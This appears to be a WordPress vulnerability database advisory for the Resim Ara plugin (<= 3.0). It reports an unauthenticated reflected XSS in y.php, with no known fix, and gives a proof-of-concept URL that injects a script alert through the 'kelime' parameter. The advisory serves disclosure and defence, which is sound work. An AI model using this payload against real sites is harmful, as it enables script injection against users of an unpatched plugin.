Resim Ara <= 3.0 - Unauthenticated Reflected XSS



Description
The WordPress plugin team was notified on January 17th, 2020.

Note: There were inconsistencies between the versions from the readme.txt (3.0), the plugin file (1.0) as well as tags (1.0 to 3.0).
Proof of Concept
http://www.example.com/wp-content/plugins/resim-ara/y.php?&kelime=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%

Affects Plugin

no known fix
- plugin closed

References

PACKETSTORM 155980

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Ricardo Sanchez
Views 3053
Verified No
WPVDB ID 10030

Timeline

Publicly Published 2020-01-16 (3 months ago)
Added 2020-01-17 (3 months ago)
Last Updated 2020-02-13 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin